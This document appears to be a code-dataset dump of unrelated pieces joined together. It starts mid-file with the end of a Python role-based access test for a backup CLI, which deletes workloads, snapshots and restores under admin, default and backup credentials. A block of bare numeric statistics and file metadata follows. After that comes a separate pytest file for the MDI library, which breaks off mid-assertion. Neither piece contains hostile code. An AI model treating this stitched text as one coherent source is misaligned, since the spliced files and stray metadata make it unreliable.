rc = cli_parser.cli_returncode(restore_command)
if rc != 0:
reporting.add_test_step("Can not execute restore_create command by admin role", tvaultconf.PASS)
LOG.debug("Command restore_create did not execute correctly by admin role")
else:
reporting.add_test_step("Can not execute restore_create command by admin role", tvaultconf.FAIL)
raise Exception("Command restore_create executed correctly by admin role")
# Run restore_delete CLI by admin role
restore_delete = command_argument_string.restore_delete + str(self.restore_id1)
rc = cli_parser.cli_returncode(restore_delete)
if rc != 0:
reporting.add_test_step("Can not execute restore_delete command by admin role", tvaultconf.PASS)
LOG.debug("Command restore_delete did not execute correctly by admin role")
else:
reporting.add_test_step("Can not execute restore_delete command by admin role", tvaultconf.FAIL)
raise Exception("Command restore_delete executed correctly by admin role")
# Run snapshot_delete CLI by admin role
snapshot_delete = command_argument_string.snapshot_delete + str(self.snapshot_id1)
rc = cli_parser.cli_returncode(snapshot_delete)
if rc != 0:
reporting.add_test_step("Can not execute snapshot_delete command by admin role", tvaultconf.PASS)
LOG.debug("Command snapshot_delete did not execute correctly by admin role")
else:
reporting.add_test_step("Can not execute snapshot_delete command by admin role", tvaultconf.FAIL)
raise Exception("Command snapshot_delete executed correctly by admin role")
# Delete workload with CLI by admin role
workload_delete = command_argument_string.workload_delete + str(self.wid1)
rc = cli_parser.cli_returncode(workload_delete)
if rc != 0:
reporting.add_test_step("Can not execute workload_delete command by admin role", tvaultconf.PASS)
LOG.debug("Command workload_delete did not execute correctly by admin role")
else:
reporting.add_test_step("Can not execute workload_delete command by admin role", tvaultconf.FAIL)
raise Exception("Command workload_delete executed correctly by admin role")
# Use nonadmin credentials
os.environ['OS_USERNAME']= CONF.identity.nonadmin_user
os.environ['OS_PASSWORD']= CONF.identity.nonadmin_password
# Create workload with CLI by default role
workload_create = command_argument_string.workload_create + " --instance instance-id=" +str(self.restore_vm_id1)
rc = cli_parser.cli_returncode(workload_create)
if rc != 0:
LOG.debug("Command workload_create did not execute correctly by default role")
reporting.add_test_step("Can not execute workload_create command by default role", tvaultconf.PASS)
else:
reporting.add_test_step("Can not execute workload_create command by default role", tvaultconf.FAIL)
raise Exception("Command workload_create executed correctly by default role")
# Run snapshot_create CLI by default role
snapshot_create = command_argument_string.snapshot_create + str(self.wid1)
rc = cli_parser.cli_returncode(snapshot_create)
if rc != 0:
reporting.add_test_step("Can not execute snapshot_create command by default role", tvaultconf.PASS)
LOG.debug("Command snapshot_create did not execute correctly by default role")
else:
reporting.add_test_step("Can not execute snapshot_create command by default role", tvaultconf.FAIL)
raise Exception("Command snapshot_create executed correctly by default role")
# Create one-click restore using CLI by default role
restore_command = command_argument_string.oneclick_restore + " " + str(self.snapshot_id1)
rc = cli_parser.cli_returncode(restore_command)
if rc != 0:
reporting.add_test_step("Can not execute restore_create command by default role", tvaultconf.PASS)
LOG.debug("Command restore_create did not execute correctly by default role")
else:
reporting.add_test_step("Can not execute restore_create command by default role", tvaultconf.FAIL)
raise Exception("Command restore_create executed correctly by default role")
# Run restore_delete CLI by default role
restore_delete = command_argument_string.restore_delete + str(self.restore_id1)
rc = cli_parser.cli_returncode(restore_delete)
if rc != 0:
reporting.add_test_step("Can not execute restore_delete command by default role", tvaultconf.PASS)
LOG.debug("Command restore_delete did not execute correctly by default role")
else:
reporting.add_test_step("Can not execute restore_delete command by default role", tvaultconf.FAIL)
raise Exception("Command restore_delete executed correctly by default role")
# Run snapshot_delete CLI by default role
snapshot_delete = command_argument_string.snapshot_delete + str(self.snapshot_id1)
LOG.debug("snapshot_delete command: " + str(snapshot_create))
rc = cli_parser.cli_returncode(snapshot_delete)
if rc != 0:
reporting.add_test_step("Can not execute snapshot_delete command by default role", tvaultconf.PASS)
LOG.debug("Command snapshot_delete did not execute correctly by default role")
else:
reporting.add_test_step("Can not execute snapshot_delete command by default role", tvaultconf.FAIL)
raise Exception("Command snapshot_delete executed correctly by default role")
# Delete workload with CLI by default role
workload_delete = command_argument_string.workload_delete + str(self.wid1)
rc = cli_parser.cli_returncode(workload_delete)
if rc != 0:
reporting.add_test_step("Can not execute workload_delete command by default role", tvaultconf.PASS)
LOG.debug("Command workload_delete did not execute correctly by default role")
else:
reporting.add_test_step("Can not execute workload_delete command by default role", tvaultconf.FAIL)
raise Exception("Command workload_delete executed correctly by default role")
# Use backupuser credentials
os.environ['OS_USERNAME']= CONF.identity.backupuser
os.environ['OS_PASSWORD']= CONF.identity.backupuser_password
# Run restore_delete CLI by backup role
restore_delete = command_argument_string.restore_delete + str(self.restore_id1)
rc = cli_parser.cli_returncode(restore_delete)
if rc != 0:
reporting.add_test_step("Execute restore_delete command by backup role", tvaultconf.FAIL)
raise Exception("Command restore_delete did not execute correctly by backup role")
else:
reporting.add_test_step("Execute restore_delete command by backup role", tvaultconf.PASS)
LOG.debug("Command restore_delete executed correctly by backup role")
wc = self.wait_for_snapshot_tobe_available(self.wid1, self.snapshot_id1)
#Delete restored VM instance and volume
self.delete_restored_vms(self.restore_vm_id1, self.restore_volume_id1)
LOG.debug("Restored VMs deleted successfully by backup role")
# Run snapshot_delete CLI by backup role
snapshot_delete = command_argument_string.snapshot_delete + str(self.snapshot_id1)
LOG.debug("snapshot_delete command: " + str(snapshot_create))
rc = cli_parser.cli_returncode(snapshot_delete)
if rc != 0:
reporting.add_test_step("Execute snapshot_delete command by backup role", tvaultconf.FAIL)
raise Exception("Command snapshot_delete did not execute correctly by backup role")
else:
reporting.add_test_step("Execute snapshot_delete command by backup role", tvaultconf.PASS)
LOG.debug("Command snapshot_delete executed correctly by backup role")
workload_available = self.wait_for_workload_tobe_available(self.wid1)
# Delete workload with CLI by backup role
workload_delete = command_argument_string.workload_delete + str(self.wid1)
rc = cli_parser.cli_returncode(workload_delete)
if rc != 0:
reporting.add_test_step("Execute workload_delete command by backup role", tvaultconf.FAIL)
raise Exception ("RBAC policy fails for workload deletion by backup role")
else:
LOG.debug("Workload deleted successfully by backup role")
reporting.add_test_step("Execute workload_delete command by backup role", tvaultconf.PASS)
reporting.test_case_to_write()
except Exception as e:
LOG.error("Exception: " + str(e))
reporting.set_test_script_status(tvaultconf.FAIL)
reporting.test_case_to_write()
| 57.420863
| 124
| 0.687966
| 1,987
| 15,963
| 5.312531
| 0.08002
| 0.037893
| 0.054566
| 0.066313
| 0.837249
| 0.81385
| 0.770273
| 0.712202
| 0.68956
| 0.683308
| 0
| 0.00694
| 0.241809
| 15,963
| 277
| 125
| 57.628159
| 0.86524
| 0.064963
| 0
| 0.396313
| 0
| 0
| 0.304826
| 0.005773
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.101382
| 0.0553
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
49e8176df4e3a50d5eb972b036da94008135514d
| 39,825
|
py
|
Python
|
ELECTRIC/mdi/tests/test_mdi.py
|
janash/ELECTRIC
|
007819cebdb26a27e706af68922721ddd5fe4a1a
|
[
"BSD-3-Clause"
] | null | null | null |
ELECTRIC/mdi/tests/test_mdi.py
|
janash/ELECTRIC
|
007819cebdb26a27e706af68922721ddd5fe4a1a
|
[
"BSD-3-Clause"
] | null | null | null |
ELECTRIC/mdi/tests/test_mdi.py
|
janash/ELECTRIC
|
007819cebdb26a27e706af68922721ddd5fe4a1a
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import sys
import glob
import subprocess
import pytest
try: # Check for local build
sys.path.append('../build')
import MDI_Library as mdi
except ImportError: # Check for installed package
import mdi
build_dir = "../build"
sys.path.append(build_dir)
driver_out_expected_f90 = """ Engine name: MM
NNODES: 2
NODE: @FORCES
NCOMMANDS: 3
COMMAND: >FORCES
NCALLBACKS: 1
CALLBACK: >FORCES
"""
# Output expected from each of the drivers
driver_out_expected_py = """ Engine name: MM
NNODES: 2
NODE: @FORCES
NCOMMANDS: 3
COMMAND: >FORCES
NCALLBACKS: 1
CALLBACK: >FORCES
NATOMS: 10
COORDS: [0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 2.0, 2.1, 2.2, 2.3, 2.4, 2.5, 2.6, 2.7, 2.8, 2.9]
FORCES: [0.0, 0.01, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 0.09, 0.1, 0.11, 0.12, 0.13, 0.14, 0.15, 0.16, 0.17, 0.18, 0.19, 0.2, 0.21, 0.22, 0.23, 0.24, 0.25, 0.26, 0.27, 0.28, 0.29]
"""
# Includes flags to prevent warning messages
mpiexec_general = "mpiexec "
mpiexec_mca = "mpiexec --mca btl_base_warn_component_unused 0 "
def format_return(input_string):
my_string = input_string.decode('utf-8')
# remove any \r special characters, which sometimes are added on Windows
my_string = my_string.replace('\r','')
return my_string
##########################
# LIBRARY Method #
##########################
def test_cxx_cxx_lib():
# get the name of the driver code, which includes a .exe extension on Windows
driver_name = glob.glob("../build/driver_lib_cxx*")[0]
# run the calculation
driver_proc = subprocess.Popen([driver_name, "-mdi", "-role DRIVER -name driver -method LIB"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == " Engine name: MM\n"
def test_f90_f90_lib():
# get the name of the driver code, which includes a .exe extension on Windows
driver_name = glob.glob("../build/driver_lib_f90*")[0]
# run the calculation
driver_proc = subprocess.Popen([driver_name, "-mdi", "-role DRIVER -name driver -method LIB"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == " Engine name: MM\n"
def test_py_py_lib():
# run the calculation
driver_proc = subprocess.Popen([sys.executable, "../build/lib_py.py", "-mdi", "-role DRIVER -name driver -method LIB"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected = '''Start of driver
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
'''
assert driver_err == ""
assert driver_out == expected
def test_py_py_lib_mpi():
# run the calculation
driver_proc = subprocess.Popen(["mpiexec","-n","2",sys.executable, "../build/lib_py.py", "-mdi", "-role DRIVER -name driver -method LIB"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected = '''Start of driver
NATOMS: 10
NATOMS: 20
NATOMS: 10
NATOMS: 20
NATOMS: 10
NATOMS: 20
NATOMS: 10
NATOMS: 20
NATOMS: 10
NATOMS: 20
NATOMS: 10
NATOMS: 20
NATOMS: 10
NATOMS: 20
NATOMS: 10
NATOMS: 20
NATOMS: 10
NATOMS: 20
NATOMS: 10
NATOMS: 20
'''
assert driver_err == ""
assert driver_out == expected
##########################
# MPI Method #
##########################
def test_cxx_cxx_mpi():
# get the names of the driver and engine codes, which include a .exe extension on Windows
driver_name = glob.glob("../build/driver_cxx*")[0]
engine_name = glob.glob("../build/engine_cxx*")[0]
# run the calculation
driver_proc = subprocess.Popen(["mpiexec","-n","1",driver_name, "-mdi", "-role DRIVER -name driver -method MPI",":",
"-n","1",engine_name,"-mdi","-role ENGINE -name MM -method MPI"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_out == " Engine name: MM\n"
assert driver_err == ""
def test_cxx_f90_mpi():
# get the names of the driver and engine codes, which include a .exe extension on Windows
driver_name = glob.glob("../build/driver_cxx*")[0]
engine_name = glob.glob("../build/engine_f90*")[0]
# run the calculation
driver_proc = subprocess.Popen(["mpiexec","-n","1",driver_name, "-mdi", "-role DRIVER -name driver -method MPI",":",
"-n","1",engine_name,"-mdi","-role ENGINE -name MM -method MPI"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == " Engine name: MM\n"
def test_cxx_py_mpi():
# get the name of the driver code, which includes a .exe extension on Windows
driver_name = glob.glob("../build/driver_cxx*")[0]
# run the calculation
driver_proc = subprocess.Popen(["mpiexec","-n","1",driver_name, "-mdi", "-role DRIVER -name driver -method MPI",":",
"-n","1",sys.executable,"engine_py.py","-mdi","-role ENGINE -name MM -method MPI"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == " Engine name: MM\n"
def test_f90_cxx_mpi():
global driver_out_expected_f90
# get the names of the driver and engine codes, which include a .exe extension on Windows
driver_name = glob.glob("../build/driver_f90*")[0]
engine_name = glob.glob("../build/engine_cxx*")[0]
# run the calculation
driver_proc = subprocess.Popen(["mpiexec","-n","1",driver_name, "-mdi", "-role DRIVER -name driver -method MPI",":",
"-n","1",engine_name,"-mdi","-role ENGINE -name MM -method MPI"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == driver_out_expected_f90
def test_f90_f90_mpi():
global driver_out_expected_f90
# get the names of the driver and engine codes, which include a .exe extension on Windows
driver_name = glob.glob("../build/driver_f90*")[0]
engine_name = glob.glob("../build/engine_f90*")[0]
# run the calculation
driver_proc = subprocess.Popen(["mpiexec","-n","1",driver_name, "-mdi", "-role DRIVER -name driver -method MPI",":",
"-n","1",engine_name,"-mdi","-role ENGINE -name MM -method MPI"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == driver_out_expected_f90
def test_f90_py_mpi():
global driver_out_expected_f90
# get the name of the driver code, which includes a .exe extension on Windows
driver_name = glob.glob("../build/driver_f90*")[0]
# run the calculation
driver_proc = subprocess.Popen(["mpiexec","-n","1",driver_name, "-mdi", "-role DRIVER -name driver -method MPI",":",
"-n","1",sys.executable,"engine_py.py","-mdi","-role ENGINE -name MM -method MPI"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == driver_out_expected_f90
def test_py_cxx_mpi():
global driver_out_expected_py
# get the name of the engine code, which includes a .exe extension on Windows
engine_name = glob.glob("../build/engine_cxx*")[0]
# run the calculation
driver_proc = subprocess.Popen(["mpiexec","-n","1",sys.executable,"driver_py.py", "-mdi", "-role DRIVER -name driver -method MPI",":",
"-n","1",engine_name,"-mdi","-role ENGINE -name MM -method MPI"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == driver_out_expected_py
def test_py_f90_mpi():
global driver_out_expected_py
# get the name of the engine code, which includes a .exe extension on Windows
engine_name = glob.glob("../build/engine_f90*")[0]
# run the calculation
driver_proc = subprocess.Popen(["mpiexec","-n","1",sys.executable,"driver_py.py", "-mdi", "-role DRIVER -name driver -method MPI",":",
"-n","1",engine_name,"-mdi","-role ENGINE -name MM -method MPI"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == driver_out_expected_py
def test_py_py_mpi():
global driver_out_expected_py
# run the calculation
driver_proc = subprocess.Popen(["mpiexec","-n","1",sys.executable,"driver_py.py", "-mdi", "-role DRIVER -name driver -method MPI",":",
"-n","1",sys.executable,"engine_py.py","-mdi","-role ENGINE -name MM -method MPI"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == driver_out_expected_py
##########################
# TCP Method #
##########################
def test_cxx_cxx_tcp():
# get the names of the driver and engine codes, which include a .exe extension on Windows
driver_name = glob.glob("../build/driver_cxx*")[0]
engine_name = glob.glob("../build/engine_cxx*")[0]
# run the calculation
driver_proc = subprocess.Popen([driver_name, "-mdi", "-role DRIVER -name driver -method TCP -port 8021"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
engine_proc = subprocess.Popen([engine_name, "-mdi", "-role ENGINE -name MM -method TCP -port 8021 -hostname localhost"])
driver_tup = driver_proc.communicate()
engine_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == " Engine name: MM\n"
def test_cxx_f90_tcp():
# get the names of the driver and engine codes, which include a .exe extension on Windows
driver_name = glob.glob("../build/driver_cxx*")[0]
engine_name = glob.glob("../build/engine_f90*")[0]
# run the calculation
driver_proc = subprocess.Popen([driver_name, "-mdi", "-role DRIVER -name driver -method TCP -port 8021"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
engine_proc = subprocess.Popen([engine_name, "-mdi", "-role ENGINE -name MM -method TCP -port 8021 -hostname localhost"])
driver_tup = driver_proc.communicate()
engine_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == " Engine name: MM\n"
def test_cxx_py_tcp():
# get the name of the driver code, which includes a .exe extension on Windows
driver_name = glob.glob("../build/driver_cxx*")[0]
# run the calculation
driver_proc = subprocess.Popen([driver_name, "-mdi", "-role DRIVER -name driver -method TCP -port 8021"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
engine_proc = subprocess.Popen([sys.executable, "../build/engine_py.py", "-mdi", "-role ENGINE -name MM -method TCP -port 8021 -hostname localhost"],
cwd=build_dir)
driver_tup = driver_proc.communicate()
engine_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == " Engine name: MM\n"
def test_f90_cxx_tcp():
global driver_out_expected_f90
# get the names of the driver and engine codes, which include a .exe extension on Windows
driver_name = glob.glob("../build/driver_f90*")[0]
engine_name = glob.glob("../build/engine_cxx*")[0]
# run the calculation
driver_proc = subprocess.Popen([driver_name, "-mdi", "-role DRIVER -name driver -method TCP -port 8021"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
engine_proc = subprocess.Popen([engine_name, "-mdi", "-role ENGINE -name MM -method TCP -port 8021 -hostname localhost"])
driver_tup = driver_proc.communicate()
engine_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == driver_out_expected_f90
def test_f90_f90_tcp():
global driver_out_expected_f90
# get the names of the driver and engine codes, which include a .exe extension on Windows
driver_name = glob.glob("../build/driver_f90*")[0]
engine_name = glob.glob("../build/engine_f90*")[0]
# run the calculation
driver_proc = subprocess.Popen([driver_name, "-mdi", "-role DRIVER -name driver -method TCP -port 8021"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
engine_proc = subprocess.Popen([engine_name, "-mdi", "-role ENGINE -name MM -method TCP -port 8021 -hostname localhost"])
driver_tup = driver_proc.communicate()
engine_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == driver_out_expected_f90
def test_f90_py_tcp():
global driver_out_expected_f90
# get the name of the driver code, which includes a .exe extension on Windows
driver_name = glob.glob("../build/driver_f90*")[0]
# run the calculation
driver_proc = subprocess.Popen([driver_name, "-mdi", "-role DRIVER -name driver -method TCP -port 8021"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
engine_proc = subprocess.Popen([sys.executable, "../build/engine_py.py", "-mdi", "-role ENGINE -name MM -method TCP -port 8021 -hostname localhost"],
cwd=build_dir)
driver_tup = driver_proc.communicate()
engine_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == driver_out_expected_f90
def test_py_cxx_tcp():
global driver_out_expected_py
# get the name of the engine code, which includes a .exe extension on Windows
engine_name = glob.glob("../build/engine_cxx*")[0]
# run the calculation
driver_proc = subprocess.Popen([sys.executable, "../build/driver_py.py", "-mdi", "-role DRIVER -name driver -method TCP -port 8021"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
engine_proc = subprocess.Popen([engine_name, "-mdi", "-role ENGINE -name MM -method TCP -port 8021 -hostname localhost"])
driver_tup = driver_proc.communicate()
engine_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == driver_out_expected_py
def test_py_f90_tcp():
global driver_out_expected_py
# get the name of the engine code, which includes a .exe extension on Windows
engine_name = glob.glob("../build/engine_f90*")[0]
# run the calculation
driver_proc = subprocess.Popen([sys.executable, "../build/driver_py.py", "-mdi", "-role DRIVER -name driver -method TCP -port 8021"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
engine_proc = subprocess.Popen([engine_name, "-mdi", "-role ENGINE -name MM -method TCP -port 8021 -hostname localhost"])
driver_tup = driver_proc.communicate()
engine_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == driver_out_expected_py
def test_py_py_tcp():
global driver_out_expected_py
# run the calculation
driver_proc = subprocess.Popen([sys.executable, "../build/driver_py.py", "-mdi", "-role DRIVER -name driver -method TCP -port 8021"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
engine_proc = subprocess.Popen([sys.executable, "../build/engine_py.py", "-mdi", "-role ENGINE -name MM -method TCP -port 8021 -hostname localhost"],
cwd=build_dir)
driver_tup = driver_proc.communicate()
engine_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
# assert driver_out == " Engine name: MM\n"
assert driver_out == driver_out_expected_py
##########################
# Unit Conversions Tests #
##########################
def test_unit_conversions_py():
# Test all charge conversions
assert mdi.MDI_Conversion_Factor("atomic_unit_of_charge", "atomic_unit_of_charge") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_charge", "coulomb") == pytest.approx(1.6021766208e-19)
assert mdi.MDI_Conversion_Factor("coulomb", "atomic_unit_of_charge") == pytest.approx(1.0 / 1.6021766208e-19)
assert mdi.MDI_Conversion_Factor("coulomb", "coulomb") == pytest.approx(1.0)
# Test some energy conversions
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "atomic_unit_of_energy") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "calorie") == pytest.approx(1.0420039967034203e-18)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "electron_volt") == pytest.approx(27.211386245988066)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "hartree") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "inverse_meter_energy") == pytest.approx(21947463.136319984)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "joule") == pytest.approx(4.35974465e-18)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "kelvin_energy") == pytest.approx(315775.02480406954)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "kilocalorie") == pytest.approx(1.0420039967034203e-21)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "kilocalorie_per_mol") == pytest.approx(627.5094737775374)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "kilojoule") == pytest.approx(4.3597446499999996e-21)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "kilojoule_per_mol") == pytest.approx(2625.4996382852164)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "rydberg") == pytest.approx(2.0)
assert mdi.MDI_Conversion_Factor("calorie", "atomic_unit_of_energy") == pytest.approx(1.0 / 1.0420039967034203e-18)
assert mdi.MDI_Conversion_Factor("electron_volt", "atomic_unit_of_energy") == pytest.approx(1.0 / 27.211386245988066)
assert mdi.MDI_Conversion_Factor("hartree", "atomic_unit_of_energy") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("inverse_meter_energy", "atomic_unit_of_energy") == pytest.approx(1.0 / 21947463.136319984)
assert mdi.MDI_Conversion_Factor("joule", "atomic_unit_of_energy") == pytest.approx(1.0 / 4.35974465e-18)
assert mdi.MDI_Conversion_Factor("kelvin_energy", "atomic_unit_of_energy") == pytest.approx(1.0 / 315775.02480406954)
assert mdi.MDI_Conversion_Factor("kilocalorie", "atomic_unit_of_energy") == pytest.approx(1.0 / 1.0420039967034203e-21)
assert mdi.MDI_Conversion_Factor("kilocalorie_per_mol", "atomic_unit_of_energy") == pytest.approx(1.0 / 627.5094737775374)
assert mdi.MDI_Conversion_Factor("kilojoule", "atomic_unit_of_energy") == pytest.approx(1.0 / 4.3597446499999996e-21)
assert mdi.MDI_Conversion_Factor("kilojoule_per_mol", "atomic_unit_of_energy") == pytest.approx(1.0 / 2625.4996382852164)
assert mdi.MDI_Conversion_Factor("rydberg", "atomic_unit_of_energy") == pytest.approx(0.5)
# Test all force conversions
assert mdi.MDI_Conversion_Factor("atomic_unit_of_force", "atomic_unit_of_force") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_force", "newton") == pytest.approx(3.753838631429819e-15)
assert mdi.MDI_Conversion_Factor("newton", "atomic_unit_of_force") == pytest.approx(1.0 / 3.753838631429819e-15)
assert mdi.MDI_Conversion_Factor("newton", "newton") == pytest.approx(1.0)
# Test some length conversions
assert mdi.MDI_Conversion_Factor("atomic_unit_of_length", "angstrom") == pytest.approx(0.52917721067)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_length", "atomic_unit_of_length") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_length", "bohr") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_length", "meter") == pytest.approx(5.29177210903e-11)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_length", "nanometer") == pytest.approx(5.29177210903e-2)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_length", "picometer") == pytest.approx(5.29177210903e+1)
assert mdi.MDI_Conversion_Factor("angstrom", "atomic_unit_of_length") == pytest.approx(1.0 / 0.52917721067)
assert mdi.MDI_Conversion_Factor("bohr", "atomic_unit_of_length") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("meter", "atomic_unit_of_length") == pytest.approx(1.0 / 5.29177210903e-11)
assert mdi.MDI_Conversion_Factor("nanometer", "atomic_unit_of_length") == pytest.approx(1.0 / 5.29177210903e-2)
assert mdi.MDI_Conversion_Factor("picometer", "atomic_unit_of_length") == pytest.approx(1.0 / 5.29177210903e+1)
# Test all mass conversions
assert mdi.MDI_Conversion_Factor("atomic_unit_of_mass", "atomic_unit_of_mass") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_mass", "kilogram") == pytest.approx(9.10938356e-31)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_mass", "gram") == pytest.approx(9.10938356e-28)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_mass", "atomic_mass_unit") == pytest.approx(0.0005485799093287202)
assert mdi.MDI_Conversion_Factor("kilogram", "atomic_unit_of_mass") == pytest.approx(1.0 / 9.10938356e-31)
assert mdi.MDI_Conversion_Factor("kilogram", "kilogram") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("kilogram", "gram") == pytest.approx(1000.0)
assert mdi.MDI_Conversion_Factor("kilogram", "atomic_mass_unit") == pytest.approx(6.022140858549162e+26)
assert mdi.MDI_Conversion_Factor("gram", "atomic_unit_of_mass") == pytest.approx(1.0 / 9.10938356e-28)
assert mdi.MDI_Conversion_Factor("gram", "kilogram") == pytest.approx(0.001)
assert mdi.MDI_Conversion_Factor("gram", "gram") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("gram", "atomic_mass_unit") == pytest.approx(6.0221408585491626e+23)
assert mdi.MDI_Conversion_Factor("atomic_mass_unit", "atomic_unit_of_mass") == pytest.approx(1.0 / 0.0005485799093287202)
